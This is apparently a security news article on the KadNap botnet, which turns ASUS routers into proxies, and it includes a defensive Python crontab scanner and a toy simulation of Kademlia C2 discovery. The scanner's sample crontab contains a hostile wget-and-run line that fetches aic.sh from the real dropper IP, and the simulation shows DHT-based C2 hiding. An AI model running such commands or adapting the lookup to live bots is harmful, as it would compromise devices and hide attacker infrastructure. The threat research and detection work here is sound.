A newly identified botnet malware, known as KadNap, primarily targets ASUS routers and other edge networking devices and turns them into a network of proxies for malicious activity. Since its emergence in August 2025, KadNap has infected approximately 14,000 devices, which form a peer-to-peer network that locates its command-and-control (C2) infrastructure using a customized version of the Kademlia Distributed Hash Table (DHT) protocol.
The decentralized design makes it significantly harder for defenders to identify and disrupt the C2 servers. According to researchers from Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network is tied to C2 infrastructure built specifically for ASUS-based bots; the remaining devices report to two other, separate control servers, which further complicates mitigation.
Most infected devices are in the United States, which accounts for 60% of the total; Taiwan, Hong Kong and Russia follow with notable shares. The infection chain begins with a malicious script, aic.sh, downloaded from 212.104.141[.]140. The script establishes persistence through a cron job that runs every 55 minutes, and its payload is an ELF binary named kad, which installs the KadNap client.
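The persistence mechanism described above gives a defender something concrete to hunt for on a suspect router. The following script is an added example written for this article, not code from the researchers or from the malware: it scans a crontab dump for the indicators the article names (the aic.sh script, the 212.104.141[.]140 host, a payload named kad and a 55-minute schedule) and a generic download-and-execute pattern. The sample crontab is constructed, and the `*/55` field is an assumption about how a 55-minute job would be written; the article gives only the interval, not the exact entry.

```python
import re

# Indicators of compromise taken from the article: the dropper script, the host it
# is fetched from (kept defanged, as in the article), the payload name and the
# 55-minute cron interval.
IOC_HOST = "212.104.141[.]140"
IOC_SCRIPT = "aic.sh"
IOC_BINARY = "kad"
IOC_MINUTE_INTERVAL = 55

# Constructed sample crontab (not a real capture). The '*/55' syntax is an assumption
# about how a 55-minute job would be written; the article only gives the interval.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * wget -q -O /tmp/aic.sh http://212.104.141.140/aic.sh && sh /tmp/aic.sh
*/55 * * * * /tmp/kad
*/15 * * * * /opt/monitor/check.sh
"""

CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl)\b.*(\|\s*|&&\s*)(sh|bash)\b")
PAYLOAD_RE = re.compile(r"(^|[\s/])" + re.escape(IOC_BINARY) + r"(\s|$)")


def refang(ioc: str) -> str:
    """Turn the defanged article form 212.104.141[.]140 back into a matchable IP."""
    return ioc.replace("[.]", ".")


def parse_cron_line(line: str):
    """Split a crontab line into (five schedule fields, command); None for comments,
    blank lines and anything that is not a five-field entry."""
    if not line.strip() or line.lstrip().startswith("#"):
        return None
    m = CRON_RE.match(line)
    if not m:
        return None
    return m.groups()[:5], m.group(6)


def minute_interval(minute_field: str):
    """Return N for a '*/N' minute field, else None."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def assess_cron_line(line: str):
    """Return the list of KadNap indicators matched by one crontab line."""
    parsed = parse_cron_line(line)
    if parsed is None:
        return []
    fields, cmd = parsed
    hits = []
    if minute_interval(fields[0]) == IOC_MINUTE_INTERVAL:
        hits.append("55-minute schedule")
    if refang(IOC_HOST) in cmd:
        hits.append("contacts " + IOC_HOST)
    if IOC_SCRIPT in cmd:
        hits.append("references " + IOC_SCRIPT)
    if PAYLOAD_RE.search(cmd):
        hits.append("runs payload named " + IOC_BINARY)
    if DOWNLOAD_EXEC_RE.search(cmd):
        hits.append("download-and-execute pattern")
    return hits


def scan_crontab(text: str):
    """Scan a crontab dump; a line is reported only when at least two indicators
    match, so a lone 55-minute schedule on a legitimate job is not flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = assess_cron_line(line)
        if len(hits) >= 2:
            findings.append((lineno, line.strip(), hits))
    return findings


if __name__ == "__main__":
    for lineno, line, hits in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {line}\n    indicators: {', '.join(hits)}")
```

Run it against the output of `crontab -l` for every user (and the contents of `/etc/cron.d` and `/var/spool/cron`) pulled from the device; the two-indicator threshold is a deliberate choice so that a benign job that happens to run every 55 minutes does not trigger on its own.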
Once running, KadNap determines the host's external IP address and queries multiple Network Time Protocol (NTP) servers for the current time, alongside recording the system uptime. To resist takedown efforts, the malware uses a modified Kademlia-based DHT to locate other botnet nodes and the C2 infrastructure. As the researchers explain, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” Because the bots discover the C2 servers through the DHT rather than through hard-coded addresses, those servers are difficult for defenders to extract and add to blocklists.
Despite its decentralized design, the researchers noted that KadNap’s Kademlia implementation is only partially decentralized in practice: bots consistently connect to two specific nodes before reaching the C2 servers. Those fixed entry points cancel much of the protection the protocol could otherwise provide, and it is this weakness that allowed the control infrastructure to be identified.
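To make concrete both how a DHT lookup keeps the C2 address out of the binary and why two fixed bootstrap nodes undo much of that hiding, here is a toy Kademlia simulation written for this article. It is not KadNap's code: the network, the addresses, the `c2-key` label from which the target ID is derived, and the parameters (32-bit IDs, k = 3, alpha = 2) are all constructed assumptions. The bot starts with nothing but the C2's DHT ID and two bootstrap contacts, runs the standard iterative FIND_NODE, and ends up with the C2's address without that address ever having been stored in the bot.

```python
import hashlib

# Toy parameters (assumptions for this example). Real Kademlia uses 160-bit IDs,
# k = 20 and alpha = 3; the parameters of KadNap's custom variant are not in the article.
ID_BITS = 32
K = 3
ALPHA = 2

# Constructed label from which the bot derives the C2's DHT ID. How KadNap actually
# derives its lookup target is not described in the article.
C2_KEY = "c2-key"


def node_id(label: str) -> int:
    """Derive a toy ID_BITS-bit DHT ID by hashing a label."""
    return int.from_bytes(hashlib.sha1(label.encode()).digest()[: ID_BITS // 8], "big")


def xor_distance(a: int, b: int) -> int:
    """Kademlia's metric: XOR of the two IDs, compared as an integer."""
    return a ^ b


def bucket_index(a: int, b: int) -> int:
    """k-bucket index: position of the highest bit in which the two IDs differ."""
    return (a ^ b).bit_length() - 1


class Node:
    def __init__(self, addr: str, id_label: str = None):
        self.addr = addr                      # what the bot must discover
        self.id = node_id(id_label or addr)   # what the bot knows in advance
        self.table = []                       # routing table: up to K contacts per bucket

    def find_node(self, target_id: int):
        """Serve a FIND_NODE RPC: the K contacts we know that are closest to target."""
        return sorted(self.table, key=lambda n: xor_distance(n.id, target_id))[:K]


def build_routing_tables(nodes):
    """Fill each node's k-buckets with up to K peers per bucket (a settled network)."""
    for node in nodes:
        buckets = {}
        for other in nodes:
            if other is node:
                continue
            bucket = buckets.setdefault(bucket_index(node.id, other.id), [])
            if len(bucket) < K:
                bucket.append(other)
        node.table = [peer for bucket in buckets.values() for peer in bucket]


def iterative_find_node(bootstrap, target_id: int, alpha: int = ALPHA):
    """Iterative lookup as run by a freshly infected bot that knows only the target
    ID and its bootstrap contacts. Returns (closest node found, addrs contacted)."""
    shortlist = {n.id: n for n in bootstrap}
    queried = set()
    contacted = []
    while target_id not in shortlist:
        batch = sorted((n for n in shortlist.values() if n.id not in queried),
                       key=lambda n: xor_distance(n.id, target_id))[:alpha]
        if not batch:
            break  # nobody left to ask: converged, or the bootstrap set was empty
        for n in batch:
            queried.add(n.id)
            contacted.append(n.addr)
            for peer in n.find_node(target_id):
                shortlist.setdefault(peer.id, peer)
    if not shortlist:
        return None, contacted
    closest = min(shortlist.values(), key=lambda n: xor_distance(n.id, target_id))
    return closest, contacted


def simulate_bot_lookup():
    """Constructed network: 40 bots plus the C2, all with made-up addresses."""
    bots = [Node(f"10.0.0.{i}") for i in range(1, 41)]
    c2 = Node("203.0.113.7", id_label=C2_KEY)  # C2 joins the DHT as an ordinary peer
    build_routing_tables(bots + [c2])
    bootstrap = bots[:2]                       # the two fixed nodes every bot asks first
    found, contacted = iterative_find_node(bootstrap, node_id(C2_KEY))
    return found.addr, contacted


if __name__ == "__main__":
    addr, contacted = simulate_bot_lookup()
    print("C2 reached at", addr, "after contacting", contacted)
```

Two things follow from the simulation. First, the lookup converges on the C2 in a handful of hops and never touches the C2's address until the DHT hands it over, which is why a static blocklist built from strings in the binary finds nothing. Second, every bot's `contacted` list begins with the same two bootstrap addresses, and with an empty bootstrap list the lookup returns nothing at all: in this toy, as in the researchers' observation, those two fixed nodes are the point where the traffic of every bot can be seen and, if they are blocked, where new bots are cut off from the DHT.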
KadNap is thought to be associated with the Doppelganger proxy service, believed to be a rebranding of the earlier Faceless service, which in turn has historical ties to the TheMoon botnet that also targeted ASUS routers. Doppelganger sells access to compromised devices as residential proxies, which customers use to route malicious traffic, add layers of pseudonymity and bypass blocklists. Such proxies commonly front distributed denial-of-service (DDoS) attacks, credential stuffing and brute-force attempts, so that the abuse traces back to KadNap’s victims rather than to the operators.
In response to the growing threat posed by the KadNap botnet, Lumen Technologies has taken proactive measures. As of publication, the company states that it has “blocked all network traffic to or from the control infrastructure.” This disruption is limited to Lumen’s own network, but the company plans to release a list of indicators of compromise (IOCs) so that other organizations can hunt for the botnet on their own systems.
As cyber threats continue to evolve, the emergence of the KadNap botnet highlights the importance of vigilance and collaboration in the cybersecurity community to safeguard against increasingly sophisticated attacks.